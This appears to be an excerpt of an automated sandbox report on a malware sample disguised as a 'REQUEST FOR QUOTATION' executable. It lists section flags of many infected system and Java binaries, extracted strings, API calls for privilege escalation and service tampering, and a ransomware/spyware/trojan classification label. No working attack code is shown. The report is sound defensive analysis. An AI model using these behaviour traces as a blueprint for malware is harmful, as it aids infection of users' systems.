              Source: FXSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7z.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zFM.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
              Source: Acrobat.exe.1.drBinary string: \\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\4202392NtQueryObjectRtlNtStatusToDosErrorRtlCompareUnicodeString\Device\WinDFSCdmRedirectorVolume\Device\HarddiskVolumeDirectory<>:"\|?*Software\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDownbEnableSameObjectCheckbSupportRDSUPDSYSTEM\CurrentControlSet\Control\Terminal Server\ClusterSettingsUvhdEnabledbFilePathPreprocessingUseFileHandleEnabledbFilePathPreprocessingShortcutEnabled"GetFinalPathNameByHandleWGetVolumeInformationByHandleWGetVolumeInformationWacrolock%s%u.%u.%u.tmp%s%s%ssnacnp64.dllsnacnp.dllADC4307573conprnauxnulcomlptshell:::\/:NtQueryInformationFilewin\src\win_utils.ccSameKernelObject check failed: {100184D2-BDC3-477a-B8D3-65548B67914C}_%uLocal\Global\NtQueryVolumeInformationFileSYSTEM\CurrentControlSet\Control\Terminal ServerGlassSessionIduserenv.dllDeriveAppContainerSidFromAppContainerNameGetAppContainerFolderPathNtOpenDirectoryObjectGetAppContainerNamedObjectPath\Sessions\%d\%sNtQueryInformationProcess[ZoneTransfer]
              Source: Acrobat.exe.1.drBinary string: \??\UNC\\\.\\Device\SftVol\ntdll.dllA:\Device\\\?\/?/UNC/\?\UNC\
              Source: VSSVC.exe.1.drBinary string: Zx86AMD64sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_1 || sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_2ppDependencyInfoAsrVhd::GetDeviceDependencyInformationwszDevicepathpVhdInfoAsrVhd::TraceVirtualDiskInfohDevice != INVALID_HANDLE_VALUEdwErrorAsrVhd::DiskBuildVhdInfowszFileNameGetDeviceDependencyInformation( wszVolume, TRUE, STORAGE_DEPENDENCY_INFO_VERSION_2, &pVhdInfo )pVirtualDiskInfo->m_rgVhdFileInfo::StringCchCopy( STRING_CCH_PARAM( wszVolume ), wszDevicePath )ulLen > 0wszVhdFileNameModified\Device\\\?\GlobalRoot
              Source: Acrobat.exe.1.drBinary string: win\src\filesystem_policy.ccFailed to process path (recursion detected):Failed to process path: error code:Unexpected error in path processing of:Unexpected error in source path processing of:::$DATA:$I30:$INDEX_ALLOCATION::$INDEX_ALLOCATION\\.\pipe\\\.\mailslot\Invalid path: \/?/?\UNC\Unexpected handle for path: Unexpected handleInvalid Object foundrequested path: actual path: Handle must be NULLCreateKeywin\src\registry_policy.ccUnexpected for: Real path: OpenKey\\?\pipe\NGLWFPipe__INS:(ML;;NW;;;LW)D:P(A;;GA;;;OW)(A;;GA;;;AC)\\?\pipe\\Device\NamedPipe\win\src\named_pipe_policy.ccSameObject check failed: InitializeProcThreadAttributeListUpdateProcThreadAttributewin\src\process_thread_policy.ccCreateProcessWAction: STATUS_ACCESS_DENIEDapp name: command line: NtCreateProcessExntdll.dllNtSuspendProcessNtResumeProcessNtQuerySymbolicLinkObjectNtOpenSymbolicLinkObjectNtClose%d\Sessions\BNOLINKSNtCreateEventNtOpenEventwin\src\signed_policy.ccHandle AccessCheck failed: ntdll.dllkernel32.dllNtAllocateVirtualMemoryNtDuplicateObjectNtFreeVirtualMemoryNtProtectVirtualMemoryNtQuerySectionNtQueryVirtualMemoryNtSignalAndWaitForSingleObjectNtWaitForSingleObjectRtlAllocateHeapRtlAnsiStringToUnicodeStringRtlCreateHeapRtlCreateUserThreadRtlDestroyHeapRtlFreeHeap_strnicmpstrlenwcslenmemcpy_wcsnicmpswprintf_sNtQueryInformationThreadNtCreateFileNtSetInformationFileNtQueryAttributesFileNtQueryFullAttributesFileNtOpenKeyNtCreateKeyNtDeleteValueKeyNtCreateMutantNtOpenMutantNtCreateSectionNtOpenSectionNtAddAtomNtFindAtomNtDeleteAtomNtQueryInformationAtomNtOpenThreadNtOpenProcessNtOpenProcessTokenNtOpenProcessTokenExNtAddAtomExg_ntNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenExCreateThread
              Source: VSSVC.exe.1.drBinary string: ::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\\\?\\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )
              Source: Acrobat.exe.1.drBinary string: REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 IS_COEX_REPAIR=1 /qn/qb REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 BROADCASTCEFRELOAD=1 \/0\*cef_*/qn CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /i msiexec.exe/i ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn.msiexec.exe/i ADDLOCAL=OptionalFeatures,DistillerCJKNative,DistillerCJKSupport,PaperCaptureOptional,PreFlightPlugin DISABLE_FIU_CHECK=1 TRANSITION_INSTALL_MODE=4 SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn\msiexec.exeSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList\MRUListAcrobat.exeMRUListAppDoNotTakePDFOwnershipAtLaunch\\\AppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\RtlGetVersionntdll.dllAdobe Systems, IncorporatedAdobe Inc.Adobe Systems Incorporated1.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1kernel32IsWow64ProcessSystem\CurrentControlSet\Control\CitrixProductVersionNumSoftware\Adobe\Acrobat\ExeSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770/\Click on 'Change' to select default PDF handler#32770ADelRCP.exepropertiesClick on 'Change' to select default PDF handler.pdfShowAppPickerForPDF.exeProgram ManagerPROGMANApplicationClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#3277012Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice.0Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice\InstallerSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfSOFTWARE\Adobe\Acrobat Reader\12{A6EADE66-0000-0000-484E-7E8A45000000}{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinorVersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\.0SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\PATHVersionMajorVersionMinor7760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderDCSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\\InstallerSOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\ENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdf{AC76BA86-0000-00
              Source: VSSVC.exe.1.drBinary string: )SYSTEM\CurrentControlSet\Control\MiniNTGetRdisk0DeviceNumberDoStorageIoctlCall(hDisk, IOCTL_STORAGE_GET_DEVICE_NUMBER, NULL, 0, (void **)&pStorageDeviceNumber)AsrGetSystemVolumeGlobalRootPathpdwDeviceNumber\\?\GLOBALROOT\arcname\multi(0)disk(0)rdisk(0)AsrGetSystemVolumeDevPath(wszDevicePath, ARRAYSIZE(wszDevicePath) )StringCchPrintf( pwszVolume, cchVolume, L"\\\\?\\GLOBALROOT%s", wszDevicePath )pwszVolumepSysInfoNtQuerySystemInformation( SystemSystemPartitionInformation, pSysInfo, cbRequiredSize, &cbRequiredSize)AsrGetSystemVolumeDevPathpDriveLayoutExppPartitionTable::StringCchCopyN( pwszVolume, cchVolume, pSysInfo->SystemPartition.Buffer, (pSysInfo->SystemPartition.Length)/sizeof(WCHAR) )AsrpGetMorePartitionInfohSystemVolumeDoVolumeIoctlCall(hSystemVolume, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, NULL, 0, (void **)&pSystemVolExtents, NULL)GetRdisk0DeviceNumber(&dwRDisk0DevNumber)AsrGetSystemVolumeGlobalRootPath( wszSysVolPath, ARRAYSIZE(wszSysVolPath) )DoVolumeIoctlCall(hBootVolume, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, NULL, 0, (void **)&pBootVolExtents, NULL)pPartitionTableGetBootVolumeGuidName(&pwszBootVolGuidName)hBootVolume%s\Device\Harddisk%d\Partition%d\::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\\\?\\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )DiskBuildDevicePartitionPath( dwDeviceNumber, pCurPtnEx->PartitionNumber, FALSE, ARRAY_COUNT_PARAM(wszDevicePath) )\\?\GLOBALROOTAsrpGetMorePartitionInfo( pStorageDeviceNumber->DeviceNumber, pDriveLayoutEx, &pPartitionTable )AsrpInitSystemInformationGetFileSytemType( wszFsName, &pPartitionTable[dwIndex].FileSystemType )AsrpGetDiskLayoutPROCESSOR_ARCHITECTUREERROR_BAD_ENVIRONMENTpSystemInfopSystemInfo->PlatformpSystemInfo->BootSysDirectorypSystemInfo->SystemPathERROR_NOT_SUPPORTEDpSystemInfo->BootWinDirectory::StringCchPrintf(ARRAY_COUNT_PARAM(wszErrorCodeString), L"0x%x", dwError)::StringCchPrintf(ARRAY_COUNT_PARAM(wszDeviceNumber), L"%d", pStorageDeviceNumber->DeviceNumber)DiskListPopulateLayoutInfo0x%xERROR_IO_DEVICEpDiDetailDiskListInitializehdevInfopNewDisk->DevicePath::StringCchCopy(pNewDisk->DevicePath, cchDevicePath, pDiDetail->DevicePath)fResultpNewDisk::StringCchCopyN( ARRAY_COUNT_PARAM(wszDevicePath), pwszVolGuid, ASR_CCH_DEVICE_PATH_FORMAT)VSS_E_CRITICAL_VOLUME_ON_INVALID_DISKAsrpMarkCriticalDiskspfCriticalDiskTableppmwszCriticalVolumeListMwszStringAppend( &mwszCurrentCriticalVolList, pwszCurVolume )ERROR_DEV_NOT_EXISTAsrpMarkCriticalPartitionsMwszStringAppend( &mwszFinalCriticalVolList, pwszCurVolume )MwszStringAppend( &mwszMoreCriticalVolList, pVirtualDiskInfo->m_rgVhdFileInfo[iVhd].m_wszVolumeUniqueName )MwszStringAppend( ppmwszCriticalVolumeList, pwszCurVolume )AsrpIsSupportedConfigurationARM64IA64
              Source: Acrobat.exe.1.drBinary string: \\.\ko.%x.%x.%xSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer320123456789abcdef\Device\HarddiskVolume
              Source: Acrobat.exe.1.drBinary string: sbox_alternate_desktop_local_winstation_\??\\\?\\??\pipe\\??\mailslot\\/?/?\\Device\
              Source: WBEngine.0.etl.23.drBinary string: \\?\GLOBALROOT\Device\HarddiskVolume1\v
              Source: VSSVC.exe.1.drBinary string: EnablePrivilegeLogEventdwLastErrorpIoctlOutputBufferpDriveLayoutDiskTraceDriveLayoutGetDriveTypeByHandlepuiDriveTypeOutSafeStrConvertGuidString(&pDriveLayoutEx->Gpt.DiskId, ARRAY_COUNT_PARAM(wszGuidString))SafeStrConvertGuidString(&pPartitionInfo->Gpt.PartitionId, ARRAY_COUNT_PARAM(wszGuidString))DiskBuildDevicePartitionPath::NtQueryVolumeInformationFile( hDisk, &IoStatusBlock, &DeviceInfo,sizeof(DeviceInfo), FileFsDeviceInformation)DiskForceDriversSyncppwszSignatureOutpwszDevicePathOut%s\Device\Harddisk%d\Partition%dpwszSignature::StringCchPrintf(pwszSignature, cchSignature, L"0x%x", pDriveLayout->Mbr.Signature)
              Source: VSSVC.exe.1.drBinary string: pPackIdpAsrSysAsrLdm::InitializeForBackupDevicePathToWin32Path(DD_VOLMGR_CONTROL_DEVICE_NAME, ARRAY_COUNT_PARAM(wszVolMgmtCtlPath))\Device\VolMgrControlpPackListDoVdsIoctlCall(hVdsDriver, IOCTL_VOLMGR_ENUM_PACKS, NULL, 0, (void **)&pOutBuffer)hrpwszXmlDocE_FAILE_OUTOFMEMORYNumPacksAsrLdmpXmlDocDynPackpTopNodeAsrLdm::BuildXmlNodesAsrSifERROR_NOT_FOUNDSystempwszXmlFilenameAsrWriteXmlToSifFileERROR_BAD_FORMAT/_o
              Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winEXE@20/157@24/13
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B0CBD0
